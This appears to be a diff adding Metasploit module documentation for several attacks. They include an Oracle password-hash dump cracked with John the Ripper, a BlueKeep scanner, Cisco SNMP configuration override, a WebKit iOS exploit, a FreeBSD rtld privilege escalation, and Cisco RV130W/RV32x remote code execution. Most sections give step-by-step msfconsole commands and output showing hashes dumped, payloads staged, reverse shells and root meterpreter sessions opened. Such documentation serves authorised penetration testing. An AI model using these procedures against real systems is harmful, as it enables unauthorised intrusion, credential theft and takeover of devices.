+   DBPASS   hunter2          yes       The password to authenticate with.
+   DBUSER   scott            yes       The username to authenticate with.
+   RHOST    127.0.0.1        yes       The Oracle host.
+   RHOSTS   127.0.0.1        yes       The target address range or CIDR identifier
+   RPORT    1522             yes       The TNS port.
+   SID      staticdb         yes       The sid to authenticate with.
+   THREADS  1                yes       The number of concurrent threads
+
+msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
+
+[*] Server is running 12c
+[*] Hash table :
+ Oracle Server Hashes
+====================
+
+ Username               Hash
+ --------               ----
+ ...
+ SCOTT                  S:BF6D4E3791075A348BA76EF533E38F7211513CCE2A3513EE3E3D4A5A4DE0;H:3814C74599475EB73043A1211742EE59;T:0911BAC55EEF63F0C1769E816355BE29492C9D01980DC36C95A86C9CE47F93790631DE3D9A60C90451CFF152E25D9E94F612A1493EC82AF8E3C4D0432B06BA4C2C693B932332BC14D2D66CEF098A4699
+ ...
+ 
+[+] Hash Table has been saved
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/oracle/oracle_hashdump) > creds
+Credentials
+===========
+
+host       origin     service            public  private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
+----       ------     -------            ------  -------      
+...                                                                                                                                                                                                                                                         -----  ------------        ----------
+127.0.0.1  127.0.0.1  1522/tcp (oracle)  SCOTT   S:BF6D4E3791075A348BA76EF533E38F7211513CCE2A3513EE3E3D4A5A4DE0;H:3814C74599475EB73043A1211742EE59;T:0911BAC55EEF63F0C1769E816355BE29492C9D01980DC36C95A86C9CE47F93790631DE3D9A60C90451CFF152E25D9E94F612A1493EC82AF8E3C4D0432B06BA4C2C693B932332BC14D2D66CEF098A4699         Nonreplayable hash  oracle12c
+```
+
+These hashes are then saved as credentials so that `jtr_oracle_fast` can crack them (using [John The Ripper "bleeding_jumbo"](https://github.com/magnumripper/JohnTheRipper)).
+
+```
+msf5 auxiliary(scanner/oracle/oracle_hashdump) > use auxiliary/analyze/jtr_oracle_fast
+msf5 auxiliary(analyze/jtr_oracle_fast) > run
+...
+[*] Cracking oracle12c hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking oracle12c hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracked passwords this run:
+[+] SCOTT:hunter2
+...
+```
+### Oracle 18c (18.4 XE) on Windows 2012
+
+```
+resource (oracle.rb)> use auxiliary/scanner/oracle/oracle_hashdump
+resource (oracle.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (oracle.rb)> set dbuser system
+dbuser => system
+resource (oracle.rb)> set dbpass oracle
+dbpass => oracle
+resource (oracle.rb)> set sid XE
+sid => XE
+resource (oracle.rb)> run
+[-] Version 18c is not currently supported
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Oracle 11g (11.2 XE) on Windows 2012
+
+```
+resource (oracle.rb)> use auxiliary/scanner/oracle/oracle_hashdump
+resource (oracle.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (oracle.rb)> set dbuser system
+dbuser => system
+resource (oracle.rb)> set dbpass oracle
+dbpass => oracle
+resource (oracle.rb)> set sid XE
+sid => XE
+msf5 auxiliary(scanner/oracle/oracle_hashdump) > set verbose true
+verbose => true
+msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
+
+[*] Server is running version 11g
+[*] Hash table :
+ Oracle Server Hashes
+====================
+
+ Username          Hash
+ --------          ----
+ APEX_040000       S:03D9B47D20C9A9EC3023177D80C0EE2D1DCEDA619215C2405177CEFFEE76
+ APEX_PUBLIC_USER  S:E8D8CCD600CBCEA08ACB158A502C5DA711B00146404621BB2F83E8997246
+ APPQOSSYS         S:4237CCB702887B049107EE6D13C312123F40E3F51208B2B70D6DA92E621D
+ CTXSYS            S:3548FDA49F84F2F7ECE4635BA0FD714EC2446723074ED6167F1CD9B6EDFB
+ DBSNMP            S:59354E99120C523F77232A8CCFDE5E780591FCE14109EEE2C86F4A9B4E8F
+ DIP               S:1E4C37D0E8DC2E556D3C02A961ACEF1500B315D076BE13E578D1A28FC757
+ FLOWS_FILES       S:A3657555975A9F7527C4B97637734D74465C592B9D231CA3DAB100ED5865
+ HR                S:F437C1647EBCEB1D1FB4BB3D866953B4BF612B343944B899E061B361F31B
+ MDSYS             S:F337C5D6300E3F8CDEDE0F2B2336415EAAE098A700A35E6731BF1370657E
+ ORACLE_OCM        S:1575D1C89A1AACFE161ED788D2DC59CF6C57AE3B6CCC341D831AAF5BC447
+ OUTLN             S:142AD444D8A63983FF69C77DBFD3E60947C14237AEC71031E24F5228D44C
+ SYS               S:BFAF1ED5A8D39CC10D07DAF03A175C65198359874DAD92F081BE09B89162
+ SYSTEM            S:D88BA08B353EC52E1EFD8433DF623773ACE3F81B7294BBC2E5C22CDD32F5
+ XDB               S:88D6BE2B593143BD5AE5185C564826F9213E71361230D3360E36C3FF55D2
+ XS$NULL           S:6C4F97FF654AE30BCD9BDBB3007EF952B5943F0A9ED491455E9FB185D8A1
+
+[+] Hash Table has been saved
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+```
@@ -0,0 +1,79 @@
+[CVE-2019-0708](https://nvd.nist.gov/vuln/detail/CVE-2019-0708) ("BlueKeep")  may allow an unauthenticated attacker to gain remote code execution on an unpatched Microsoft Windows workstation or server exposing the [Remote Desktop Protocol (RDP)](https://docs.microsoft.com/en-us/windows/desktop/termserv/remote-desktop-protocol).  As a result, the vulnerability has the maximum CVSS score of 10.0.
+
+The vulnerability exists and been patched in workstation editions of Windows XP, Windows Vista, and Windows 7.  Server releases of Windows are also affected and have been patched: Windows 2003, Windows 2008 and Windows 2008 R2.
+
+This module, `auxiliary/scanner/rdp/cve_2019_0708_bluekeep`, scans all versions of Windows, reporting back the vulnerable state of one or more targets.  The vulnerability is not known to exist in versions of Windows 8 (or above) or Windows 2012 (or above).  However, the scanner can safely be used against all Windows versions without effect on the RDP service or clients.
+
+## Vulnerable Application
+
+Remote Desktop Protocol (RDP), also known as Terminal Services, allows authenticated users to remotely administer Windows workstations and servers.  RDP is common in enterprise networks, as it allows IT administrators and users alike to conveniently work remotely.  Additionally, RDP is not uncommon to see exposed to the Internet, sometimes on its default port of TCP/3389.
+
+RDP is supported on Windows platforms from Windows XP through all modern versions of Windows.  Newer versions of Windows (XP SP3+, Vista, and up) support Network Level Authentication (NLA), which provides enhanced authentication and mitigates some RDP-based attacks.
+
+## Verification Steps
+
+  1. Set up a Windows target (XP, Vista, 7, 2003, 2008, 2008 R2).
+  2. Start msfconsole.
+  3. Load the module: `use auxiliary/scanner/rdp/cve_2019_0708_bluekeep`
+  4. Specify the IP address of one or more targets: `set RHOSTS 192.168.1.1-5`
+  5. Optionally, change the target port from the default of `3389`: `set RPORT 31337`
+  6. Launch the scanner: `run`
+
+## Scenarios
+
+#### A vulnerable version and configuration of Microsoft Windows
+If the target has RDP accessible with NLP disabled, and is running a vulnerable version of Windows (XP, 7, 2003, 2008, 2008 R2) without a [patch](https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708), it will return a Vulnerable status:
+
+```
+[+] 192.168.1.2:3389  - The target is vulnerable.
+[*] 192.168.1.2:3389  - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+#### A patched or NLP-enabled configuration of Microsoft Windows
+If the target has RDP accessible, but is not vulnerable for one or more reasons, it may have NLP enabled or may have been [patched](https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708).  In these cases, a patched or NLP-enabled target will return:
+
+```
+[*] 192.168.1.3:3389  - The target is not exploitable.
+[*] 192.168.1.3:3389  - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+#### A non-vulnerable version of Microsoft Windows
+If the target has RDP accessible, but is a newer, non-vulnerable version of Windows (8, 10, 2012, 2016), or may have been [patched](https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708).  In these cases, a non-vulnerable target will return:
+
+```
+[*] 192.168.1.4:3389  - The target is not exploitable.
+[*] 192.168.1.4:3389  - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+#### A host without RDP enabled
+A non-Windows target, or a Windows target with RDP disabled or firewalled, will report failure to connect:
+
+```
+[*] 192.168.220.1:3389    - The target service is not running, or refused our connection.
+[*] 192.168.220.1:3389    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Testing
+
+This scanner module has been tested against a variety of Windows hosts, ranging from Windows XP through Windows 2016.  During testing, no adverse effects or logging was identified on release builds.  (Note: Debug/checked builds exhibited crashes, but these should not be found in production environments.)
+
+Workstation versions:
+ - Windows XP SP2 (x86), SP3 (x86), Version 2003 (x64)
+ - Windows Vista SP0 (x86), SP0 (x64), SP2 (x64)
+ - Windows 7 SP1 (x86), SP1 (x64)
+ - Windows 10 1709, 1809 (x64)
+
+Server versions:
+ - Windows 2000 SP4 (x86)
+ - Windows 2003 SP0 (x86), SP1 (x86), SP1 (x64), SP2 (x86), R2 SP1 (x86), R2 SP2 (x86)
+ - Windows 2008 SP0 (x64), SP1 (x86), R2 SP1 (x64)
+ - Windows 2012 R2 (x64)
+ - Windows 2016 Build 1607 (x64)
+
+### Questions?  Issues?
+
+If you encounter issues with the module, consider reaching out to the developers and user community [using Slack](https://www.metasploit.com/slack).  If you encounter crashing on any targets, please consider [opening a issue](https://github.com/rapid7/metasploit-framework/issues/new).
@@ -3,18 +3,36 @@
  Cisco IOS devices can be configured to retrieve, via tftp,  a file via SNMP.
  This is a well [documented](https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html#copying_startup)
  feature of IOS and many other networking devices, and is part of an administrator functionality.
+  This functionality can also be used to change their running configuration. This is documented [here](https://www.ciscozine.com/send-cisco-commands-via-snmp/). 
  A read-write community string is required, as well as a tftp server (metasploit includes one).
-  The file will be saved to `flash:`.
+  The default functionality of the module will upload the file and it will be saved to `flash:`.
+  The `Override_Config` action will override the running configuration of the device and the file will not be saved.

 ## Verification Steps

+Upload_File (Default Action)
+
  1. Enable SNMP with a read/write community string on IOS: `snmp-server community private rw`
  2. Start msfconsole
  3. Do: ```use auxiliary/scanner/snmp/cisco_upload_file```
  4. Do: ```set COMMUNITY [read-write snmp]```
-  5. Do: ```set rhosts [ip]```
-  6. Do: ```set source [file]```
-  7. Do: ```run```
+  5. Do: ```set lhost [your IP address]```
+  6. Do: ```set rhosts [ip]```
+  7. Do: ```set source [file]```
+  8. Do: ```run```
+  
+Override_Config
+
+  1. Enable SNMP with a read/write community string on IOS: `snmp-server community private rw`
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/snmp/cisco_upload_file```
+  4. Do: ```set COMMUNITY [read-write snmp]```
+  5. Do: ```set lhost [your IP address]```
+  6. Do: ```set rhosts [ip]```
+  7. Do: ```set source [file]```
+  8. Do: ```set action [Override_Config]```
+  9. Do: ```run```
+  10. You can **Verify** that the running config has been overridden by using the **auxiliary/scanner/snmp/cisco_config_tftp** module to download the current running config from the device.

 ## Options

@@ -47,3 +65,27 @@ msf5 auxiliary(scanner/snmp/cisco_upload_file) > run
 [*] Shutting down the TFTP service...
 [*] Auxiliary module execution completed
 ```
+### Cisco 3560G switch running IOS 12.2
+
+```
+
+`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set COMMUNITY private`
+`COMMUNITY => private`
+`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set LHOST 10.20.164.164`
+`LHOST => 10.20.164.164`
+`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set action Override_Config`
+`action => Override_Config`
+`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set rhosts 10.20.205.5`
+`rhosts => 10.20.205.5`
+`msf5 auxiliary(scanner/snmp/cisco_upload_file) > set source /root/Desktop/newconfig`
+`source => /root/Desktop/newconfig`
+`msf5 auxiliary(scanner/snmp/cisco_upload_file) > run`
+
+`[*] Starting TFTP server...`
+`[*] Copying file newconfig to 10.20.205.5...`
+`[*] Scanned 1 of 1 hosts (100% complete)`
+`[*] Providing some time for transfers to complete...`
+`[*] Shutting down the TFTP service...`
+`[*] Auxiliary module execution completed`
+
+```
@@ -0,0 +1,55 @@
+## Description
+
+This module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233).  
+
+The type confusion leads to the ability to allocate fake Javascript objects, as well as the ability to find the address in memory of a Javascript object.  This allows us to construct a fake JSCell object that can be used to read and write arbitrary memory from Javascript.  The module then uses a ROP chain to write the first stage shellcode into executable memory within the Safari process and kick off its execution.  
+
+The first stage maps the second stage macho (containing CVE-2017-13861) into executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake exploit leads to a kernel task port (TFP0) that can read and write arbitrary kernel memory. The processes credential and sandbox structure in the kernel is overwritten and the meterpreter payloads code signature hash is added to the kernels trust cache, allowing Safari to load and execute the (self-signed) meterpreter payload.
+
+## Vulnerable Application
+
+The exploit should work all 64-bit devices (iPhone 5S and newer) running iOS 10 up to iOS 11.2.
+
+## Verification Steps
+
+ * Start msfconsole
+ * `use exploit/apple_ios/browser/webkit_createthis`
+ * `set LHOST` and `SRVHOST` as appropriate
+ * exploit
+ * Browse to the given URL with a vulnerable device from Safari
+ * Note that the payload is specially created for this exploit, due to sandbox
+   limitations that prevent spawning new processes.
+
+## Scenarios
+
+### 64bit iPhone 5S running iOS 10.2.1
+
+```
+msf5 exploit(apple_ios/browser/webkit_createthis) > exploit
+[*] Started reverse TCP handler on 192.168.1.51:4444 
+[*] Using URL: http://0.0.0.0:8080/
+[*] Local IP: http://192.168.1.51:8080/
+[*] Server started.
+[*] 192.168.1.34     webkit_createthis - Requesting / from Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1
+[*] 192.168.1.34     webkit_createthis - Requesting /exploit from Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1
+[+] 192.168.1.34     webkit_createthis - Sent async_wake exploit
+[+] 192.168.1.34     webkit_createthis - Sent sha1 iOS 10 payload
+[*] Meterpreter session 1 opened (192.168.1.51:4444 -> 192.168.1.34:49211) at 2019-04-15 11:34:01 +0200
+
+msf5 exploit(apple_ios/browser/webkit_createthis) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                           Information                                  Connection
+  --  ----  ----                           -----------                                  ----------
+  1         meterpreter aarch64/apple_ios  uid=0, gid=0, euid=0, egid=0 @ 192.168.1.34  192.168.1.51:4444 -> 192.168.1.34:49211 (192.168.1.34)
+
+msf5 exploit(apple_ios/browser/webkit_createthis) > sessions 1
+[*] Starting interaction with 1...
+
+meterpreter > pwd
+/System/Library/Frameworks/WebKit.framework/XPCServices/com.apple.WebKit.WebContent.xpc
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+```
@@ -0,0 +1,149 @@
+## Description
+
+  This module exploits a vulnerability in the FreeBSD
+  run-time link-editor (rtld).
+
+  The rtld `unsetenv()` function fails to remove `LD_*`
+  environment variables if `__findenv()` fails.
+
+  This can be abused to load arbitrary shared objects using
+  `LD_PRELOAD`, resulting in privileged code execution.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on:
+
+  * FreeBSD 7.2-RELEASE (amd64)
+  * FreeBSD 8.0-RELEASE (amd64)
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/freebsd/local/rtld_execl_priv_esc`
+  4. `set SESSION <SESSION>`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+
+## Scenarios
+
+### FreeBSD 7.2-RELEASE (amd64)
+
+  ```
+  msf5 > use exploit/freebsd/local/rtld_execl_priv_esc 
+  msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set lhost 172.16.191.165
+  lhost => 172.16.191.165
+  msf5 exploit(freebsd/local/rtld_execl_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [+] FreeBSD version 7.2-RELEASE appears vulnerable
+  [+] gcc is installed
+  [+] /sbin/ping is setuid
+  [*] Writing '/tmp/.Qv98Z0.c' (149 bytes) ...
+  [*] Max line length is 131073
+  [*] Writing 149 bytes in 1 chunks of 543 bytes (octal-encoded), using printf
+  [*] Writing '/tmp/.Re1l7JG.c' (413 bytes) ...
+  [*] Max line length is 131073
+  [*] Writing 413 bytes in 1 chunks of 1470 bytes (octal-encoded), using printf
+  [*] Writing '/tmp/.X85bYhTRF' (172 bytes) ...
+  [*] Max line length is 131073
+  [*] Writing 172 bytes in 1 chunks of 524 bytes (octal-encoded), using printf
+  [*] Launching exploit...
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] usage: ping [-AaDdfnoQqRrv] [-c count] [-G sweepmaxsize] [-g sweepminsize]
+  [*]             [-h sweepincrsize] [-i wait] [-l preload] [-M mask | time] [-m ttl]
+  [*]             [-P policy] [-p pattern] [-S src_addr] [-s packetsize] [-t timeout]
+  [*]             [-W waittime] [-z tos] host
+  [*]        ping [-AaDdfLnoQqRrv] [-c count] [-I iface] [-i wait] [-l preload]
+  [*]             [-M mask | time] [-m ttl] [-P policy] [-p pattern] [-S src_addr]
+  [*]             [-s packetsize] [-T ttl] [-t timeout] [-W waittime]
+  [*]             [-z tos] mcast-group
+  [*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.241:61425) at 2019-05-03 04:34:07 -0400
+  [+] Deleted /tmp/.Qv98Z0.c
+  [+] Deleted /tmp/.Qv98Z0.o
+  [+] Deleted /tmp/.Fv3rwXn.0
+  [+] Deleted /tmp/.Re1l7JG.c
+  [+] Deleted /tmp/.Re1l7JG
+  [+] Deleted /tmp/.X85bYhTRF
+
+  id
+  uid=0(root) gid=0(wheel) groups=0(wheel),1001(user)
+  uname -a
+  FreeBSD freebsd-7-2-amd64.local 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Fri May  1 07:18:07 UTC 2009     root@driscoll.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
+
+  ```
+
+### FreeBSD 8.0-RELEASE (amd64)
+
+  ```
+  msf5 > use exploit/freebsd/local/rtld_execl_priv_esc 
+  msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set lhost 172.16.191.165
+  lhost => 172.16.191.165
+  msf5 exploit(freebsd/local/rtld_execl_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [+] FreeBSD version 8.0-RELEASE appears vulnerable
+  [+] gcc is installed
+  [+] /sbin/ping is setuid
+  [*] Writing '/tmp/.ppHMfMh.c' (147 bytes) ...
+  [*] Max line length is 131073
+  [*] Writing 147 bytes in 1 chunks of 536 bytes (octal-encoded), using printf
+  [*] Writing '/tmp/.aSlXLjlX.c' (415 bytes) ...
+  [*] Max line length is 131073
+  [*] Writing 415 bytes in 1 chunks of 1476 bytes (octal-encoded), using printf
+  [*] Writing '/tmp/.9BdfNzy' (172 bytes) ...
+  [*] Max line length is 131073
+  [*] Writing 172 bytes in 1 chunks of 524 bytes (octal-encoded), using printf
+  [*] Launching exploit...
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] /libexec/ld-elf.so.1: environment corrupt; missing value for 
+  [*] usage: ping [-AaDdfnoQqRrv] [-c count] [-G sweepmaxsize] [-g sweepminsize]
+  [*]             [-h sweepincrsize] [-i wait] [-l preload] [-M mask | time] [-m ttl]
+  [*]             [-P policy] [-p pattern] [-S src_addr] [-s packetsize] [-t timeout]
+  [*]             [-W waittime] [-z tos] host
+  [*]        ping [-AaDdfLnoQqRrv] [-c count] [-I iface] [-i wait] [-l preload]
+  [*]             [-M mask | time] [-m ttl] [-P policy] [-p pattern] [-S src_addr]
+  [*]             [-s packetsize] [-T ttl] [-t timeout] [-W waittime]
+  [*]             [-z tos] mcast-group
+  [*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.239:57343) at 2019-05-03 04:36:16 -0400
+  [+] Deleted /tmp/.ppHMfMh.c
+  [+] Deleted /tmp/.ppHMfMh.o
+  [+] Deleted /tmp/.VWnmV5K86.0
+  [+] Deleted /tmp/.aSlXLjlX.c
+  [+] Deleted /tmp/.aSlXLjlX
+  [+] Deleted /tmp/.9BdfNzy
+
+  id
+  uid=0(root) gid=0(wheel) groups=0(wheel)
+  uname -a
+  FreeBSD freebsd-8-0-amd64.local 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:02:08 UTC 2009     root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
+
+  ```
+
@@ -0,0 +1,27 @@
+# Cisco RV130W Routers Management Interface Remote Command Execution
+
+A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.
+
+The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
+
+A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
+system of the affected device as a high-privilege user.
+
+## Vulnerable Device
+
+* RV130 Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+* RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+
+This exploit was specifically written against version 1.0.3.28. To test, you can find the
+firmware here: https://software.cisco.com/download/home/285026141/type/282465789/release/1.0.3.28
+
+## Verification Steps
+
+1. Start msfconsole
+2. ```use exploit/linux/http/cisco_rv130_rmi_rce```
+3. ```set rhost [IP]```
+4. ```set payload linux/armle/meterpreter_reverse_tcp```
+5. ```set lhost [IP]```
+6. ```exploit```
+7. You should get a session
+
@@ -0,0 +1,148 @@
+## Intro
+This module automatically exploits two vulnerabilities to create an effectively
+unauthenticated remote code execution on RV320 and RV325 routers.
+
+The module will perform the following steps:
+
+First the module will download the configuration. Then it will extract the MD5
+password hash for the web interface user. The MD5 password hash is directly
+accepted during login instead of the plain text password. With the MD5 hash the
+module will authenticate to the web interface of the router and get a valid
+authentication cookie. 
+
+The second step is using the authentication cookie to
+send an authenticated request to the web interface which exploits a command
+injection vulnerability. The injection is limited to ~50 characters. Therefore,
+the module uses a web server to stage a shell payload for the MIPS64
+architecture of the router. Depending on the payload the module will result in
+a shell or meterpreter session.
+
+## Vulnerable Application:
+
+Cisco Small Business Routers RV320 and RV325 with firmware versions between
+1.4.2.15 and 14.2.20.
+
+Link to vulnerable Firmware Version:
+https://software.cisco.com/download/home/284005929/type/282465789/release/1.4.2.20?i=!pp
+
+
+Links to Advisories:
+Part 1 of the exploit (configuration download):
+https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export
+
+Part 2 of the exploit (command injection in web interface):
+https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection
+
+Advisories by vendor:
+https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
+https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject
+
+## Options
+
+**RHOSTS**
+Configure the remote vulnerable system.
+
+**RPORT**
+Configure the TCP port of the HTTP/HTTPS management web interface.
+
+**USE_SSL**
+This flag controls whether the remote management web interface is accessible
+via HTTPS or not. Should be false for HTTP and true for HTTPS.
+
+**PAYLOAD**
+Configure the Metasploit payload that you want to stage. Must be for MIPS64
+arch.  Set payload Options accordingly.
+
+**SRVHOST**
+The module stages the payload via a web server. This is the binding interface
+IP. Default can be set to 0.0.0.0. 
+
+**HTTPDelay**
+This configures how long the module should wait for the incoming HTTP
+connection to the HTTP stager.
+
+## Verification Steps:
+
+1. Have exploitable RV320 or RV325 router (exampe IP: 192.168.1.1):
+2. Start `msfconsole`:
+3. Do:  ```use exploit/linux/http/cisco_rv32x_rce```
+4. Do: ```set RHOSTS 192.168.1.1```
+5. Do: ```set payload linux/mips64/meterpreter_reverse_tcp``` (Set the MIPS64 payload you want to use)
+6. Do: ```set LHOST 192.168.1.2``` (Setting your own IP here, example: 192.168.1.2)
+7. Do: ```set RPORT 8007``` (Set the remote Port on which the router web interface is accessible)
+8. Do: ```run```
+9. Gives you a privileged (uid=0) shell or in the example a meterpreter session.
+
+
+## Scenario
+
+Exploiting a vulnerable RV320 router with publicly accessible HTTPS web
+interface on TCP port 443: 
+```
+msf5 exploit(linux/http/cisco_rv32x_rce) > set RHOSTS 192.168.1.1
+msf5 exploit(linux/http/cisco_rv32x_rce) > set payload linux/mips64/meterpreter_reverse_tcp
+msf5 exploit(linux/http/cisco_rv32x_rce) > set LHOST 192.168.1.2
+msf5 exploit(linux/http/cisco_rv32x_rce) > set RPORT 443
+msf5 exploit(linux/http/cisco_rv32x_rce) > set USE_SSL true
+msf5 exploit(linux/http/cisco_rv32x_rce) > run
+```
+
+Demo example output for the module:
+```
+msf5 > use exploit/linux/http/cisco_rv32x_rce 
+msf5 exploit(linux/http/cisco_rv32x_rce) > show options
+
+Module options (exploit/linux/http/cisco_rv32x_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   HTTPDELAY  15               yes       Time that the HTTP Server will wait for the payload request
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target address range or CIDR identifier
+   RPORT      8007             yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080             yes       The local port to listen on.
+   URIPATH    /                yes       The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)
+   USE_SSL    false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                       no        HTTP server virtual host
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   LINUX MIPS64
+
+msf5 exploit(linux/http/cisco_rv32x_rce) > set RHOSTS 192.168.1.1
+RHOSTS => 192.168.1.1
+msf5 exploit(linux/http/cisco_rv32x_rce) > set payload linux/mips64/meterpreter_reverse_tcp
+payload => linux/mips64/meterpreter_reverse_tcp
+msf5 exploit(linux/http/cisco_rv32x_rce) > set LHOST 192.168.1.2
+LHOST => 192.168.1.2
+msf5 exploit(linux/http/cisco_rv32x_rce) > set RPORT 443
+RPORT => 443
+msf5 exploit(linux/http/cisco_rv32x_rce) > set USE_SSL true
+USE_SSL => true
+msf5 exploit(linux/http/cisco_rv32x_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.2:4444 
+[*] Using URL: http://0.0.0.0:8080/
+[*] Local IP: http://192.168.1.2:8080/
+[*] Server started.
+[*] Downloading configuration from 192.168.1.1:443
+[*] Using SSL connection to router.
+[*] Successfully downloaded config
+[*] Got MD5-Hash: dfead10390e560aea745ccba53e044ed
+[*] Loging in as user cisco using password hash.
+[*] Using default auth_key 1964300002
+[*] Successfully logged in as user cisco.
+[*] Got cookies: mlap=RGVmYXVsdDE6Ojo6Y2lzY28=;
+[*] Sending payload. Staging via http://192.168.1.2:8080/.
+[*] 192.168.1.1:443 - Payload request received: /
+[*] Waiting for stager connection timed out. Try increasing the delay.
+[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.1:48580) at 2019-03-14 10:00:00 +0100
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: uid=0, gid=99, euid=0, egid=99
+```
@@ -0,0 +1,86 @@
+## Description
+
+This module exploits a vulnerability found in Cisco Prime Infrastructure. The issue is that the TarArchive Java class the HA Health Monitor component uses does not check for any directory traversals while unpacking a Tar file, which can be abused by a remote user to leverage the UploadServlet class to upload a JSP payload to the Apache Tomcat's web apps directory, and gain arbitrary remote code execution. Note that authentication is not required to exploit this vulnerability.
+
+## Vulnerable Application
+
+Cisco Prime Infrastructure releases prior to 3.4.1, 3.5, and 3.6, also EPN Manager releases prior to 3.0.1. The Metasploit module is specifically designed to target CPI 3.4.0.
+
+## Notes on Setup
+
+While developing the exploit, I happended to run into several issues that made the process more difficut. It was really because I didn't have the best hardware to work with, but in case you are trying to set up Cisco Prime Infrastructure as VMs like me, you may want to read this first.
+
+Special thanks to Steven Seeley (mr_me) for providing some of the most important setup notes himself.
+
+**Hardware Requirements**
+
+There are two machines you want to set up using the same ISO, the first is called the "primary" server, and the other is "secondary" (High Availability) server. They both require the same hardware:
+
+* 4 CPU Cores.
+* 12288 MB of RAM (12GB).
+* 350GB of hard drive space, but you may still run out of it in days.
+* Both VMs should be on the same network.
